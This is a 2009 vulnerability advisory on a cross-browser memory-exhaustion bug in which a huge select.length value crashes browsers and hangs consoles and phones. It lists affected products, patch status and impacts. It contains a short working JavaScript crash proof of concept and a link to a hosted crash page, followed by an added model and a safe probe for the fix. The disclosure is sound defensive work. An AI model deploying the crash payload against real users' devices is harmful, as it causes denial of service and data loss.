G-SEC™ regularly publishes advisories about vulnerabilities that we discovered during our research. G-SEC™ tries to follow responsible disclosure guidelines whenever possible.

Advisories

One bug to rule them all - IE5, IE6, IE7, IE8, Netscape, Firefox, Safari, Opera, Konqueror, Seamonkey, Wii, PS3, iPhone, iPod, Nokia, Siemens.... and more.



Reference : [GSEC-TZO-44-2009] - One bug to rule them all

CVE : CVE-2009-1692 (created by Apple; this bug has the same root cause)

Credit: Thierry Zoller



Affected products :

Internet Explorer 5, 6, 7, 8 (all versions)



Chrome (limited)



Opera



Seamonkey



Midbrowser



Netscape 6 & 8 (9 years ago)



Konqueror (all versions)



Apple iPhone + iPod



Apple Safari



Thunderbird



Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet



Aigo P8860 (Browser hangs and cannot be restarted)



Siemens phones



Google Android G1 (TC4-RC30 & Firmware 1.5, Kernel: 2.6.27-00393-g6607056, Build: CRB4)

G-SEC thanks Scott Fraser for the notice



Blackberry 8800 & 8130 (Browser crash due to null ptr deref)

G-SEC thanks "528-0444" & "Tyler Reguly" for the notice



possibly more devices and products that support Javascript.



Patch status :

Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19

https://bugzilla.mozilla.org/show_bug.cgi?id=460713



Thunderbird (probably through the above Mozilla engine update)

Seamonkey 1.1.17 and SeaMonkey 2 (soon to be Beta) have been patched



IE : No fix for IE5,IE6,IE7,IE8 until IE9



Konqueror : unknown (did not respond)



Apple iPhone&iPod : patched



Nokia : unknown, opened a case but never came back



Aigo P8860 : unknown



Siemens : unknown



Chrome : Patched, version unknown (only the tab was affected anyway)



Webkit : fixed in r41741 - https://bugs.webkit.org/show_bug.cgi?id=23319



Opera : Patched after version 9.64



Sony PS3 - still affected

Nintendo Wii Opera - still affected, Opera sent a "notice" to Nintendo, never heard back from Opera

Others ? Find out by visiting the POC at http://crashthisthing.com/select.html



I. Background

II. Description

III. Impact

Konqueror (Ubuntu) - allocates 2GB of memory, then either the browser crashes or (most often) the OS reboots. Ubuntu's out-of-memory handling does not necessarily kill the process that consumes too much memory; the kernel's OOM killer may pick another process instead. This sometimes leads to processes that are vital for the OS being killed, hence the reboot. I am not kidding. Thanks to 'FX' for the memory management hint.

Chrome : allocates 2GB of memory, then the tab crashes with a null pointer dereference





Firefox : allocates 2GB of memory, then the browser crashes





IE5,6,7,8 : allocates 2GB of memory, then the browser crashes





Opera : allocates and commits as much memory as is available; it will not crash, but other applications become unstable





Nintendo Wii (Opera) : Console hangs, needs hard reset

Video: http://vimeo.com/2937101 (Thanks to David Raison)





Sony PS3 - Console hangs, needs hard reset

Video: http://vimeo.com/2937101 (Thanks to Chris Gates)





iPhone - iPhone hangs and needs hard reset

Video: http://vimeo.com/2873339 (Thanks to g0tcha)





Aigo P8860 - Browser hangs and cannot be restarted



IV. Proof of concept

Quoting Wikipedia: "ECMAScript is a scripting language, standardized by Ecma International in the ECMA-262 specification and ISO/IEC 16262. The language is widely used on the web, especially in the form of its three best-known dialects, JavaScript, ActionScript, and JScript."

Setting the length property of a select element to a large integer results in continuous allocation of x+n bytes of memory, exhausting memory after a while. The impact varies from a null pointer dereference (no more memory, hence the browser crashes) to a reboot of the complete operating system (Konqueror on Ubuntu). No limit had ever been specified as to how many HTML elements a select element should handle; after this bug was reported, vendors apparently agreed on a limit of 10,000 elements: "Talked to some Apple and Opera guys at the WHATWG social, and we decided this was a good number". The impact varies from browser to browser and sometimes from OS to OS.

The proof of concept (the original omitted the opening script tag and the closing brace of poc()):

<script>
function poc(o) {
  e = document.createElement("select");
  e.length = 2147483647;
}

function go() {
  poc(0);
}
</script>

URL: http://www.crashthisthing.com/select.html

Some have not understood what this code does: it does NOT loop, as some vendors claimed; it assigns select.length ONCE with a huge integer. One might wonder whether, over the 9 years this bug existed, nobody ever assigned a large number to select.length.
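The following is an added example, not code from the advisory or from any browser vendor. It models the two behaviours the advisory describes for the select length setter: the pre-fix semantics, where growing length from m to n appends n-m option elements in one go, and the post-fix semantics, where an assignment above an agreed cap is refused before anything is allocated. It also provides a non-crashing probe that asks a live document for cap+1 options and reports whether the engine honoured the cap, so a tester can check a browser without triggering the denial of service. The cap value 10,000 is the figure quoted in the advisory; engines may have settled on a different limit, so the threshold is a parameter. The names MAX_SELECT_LENGTH, applyLengthUnbounded, applyLengthCapped, makeFakeDocument and probeSelectLengthCap are this example's own, and the fake document is constructed here so the code runs offline in Node.

```javascript
// Added example (not from the advisory). Models the select.length setter
// before and after the vendor-agreed cap, plus a safe probe for a real page.

// Cap quoted in the advisory ("we decided this was a good number").
// Assumption: real engines may enforce a different value.
const MAX_SELECT_LENGTH = 10000;

// Pre-fix semantics as described in the advisory: a single assignment
// appends (n - current) option elements, so 2147483647 commits gigabytes
// of memory before anything can stop it. Do NOT call this with a huge n.
function applyLengthUnbounded(select, newLength) {
  const n = newLength >>> 0; // WebIDL unsigned long coercion, as the DOM does
  while (select.options.length < n) {
    select.options.push(select.ownerDocument.createElement("option"));
  }
  select.options.length = n; // shrinking truncates the option list
}

// Post-fix semantics: refuse over-large assignments instead of allocating.
// Whether a browser throws, clamps or silently ignores is engine-specific;
// this model ignores and reports the refusal to the caller.
function applyLengthCapped(select, newLength, cap = MAX_SELECT_LENGTH) {
  const n = newLength >>> 0;
  if (n > cap) {
    return false;
  }
  applyLengthUnbounded(select, n);
  return true;
}

// Minimal stand-in for `document`, constructed for this example, with a
// select element whose `length` property follows one of the two models.
function makeFakeDocument(capped) {
  const doc = {
    createElement(tag) {
      if (tag === "option") {
        return { tagName: "OPTION" };
      }
      const select = { tagName: "SELECT", options: [], ownerDocument: doc };
      Object.defineProperty(select, "length", {
        get() { return select.options.length; },
        set(v) {
          if (capped) {
            applyLengthCapped(select, v);
          } else {
            applyLengthUnbounded(select, v);
          }
        },
      });
      return select;
    },
  };
  return doc;
}

// Safe probe: requests cap+1 options, which is cheap even on an unpatched
// engine, and reports whether the engine honoured the cap. In a browser,
// call probeSelectLengthCap(document) from the console.
function probeSelectLengthCap(doc, cap = MAX_SELECT_LENGTH) {
  const e = doc.createElement("select");
  try {
    e.length = cap + 1;
  } catch (_) {
    // Some engines throw on an over-large length; that still counts as capped.
  }
  return { capped: e.length <= cap, observedLength: e.length };
}

// Stand-alone demonstration on the two constructed documents.
if (typeof require !== "undefined" && require.main === module) {
  console.log("unpatched model:", probeSelectLengthCap(makeFakeDocument(false)));
  console.log("patched model:  ", probeSelectLengthCap(makeFakeDocument(true)));
}
```

On the unpatched model the probe reports 10,001 options and `capped: false`; on the patched model the assignment is refused and the select stays empty. Running the probe against a real `document` is safe because it never requests more than cap+1 options, unlike the PoC above.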

V. Disclosure timeline

Nothing particular to note.

VI. Thanks

Chris Gates, FX, David Raison, Fahem Adam, a team of engineers that recognise themselves, oCert for not helping coordinate this bug.

VII. Media Coverage

Note: All trademarks mentioned herein belong to their respective owners.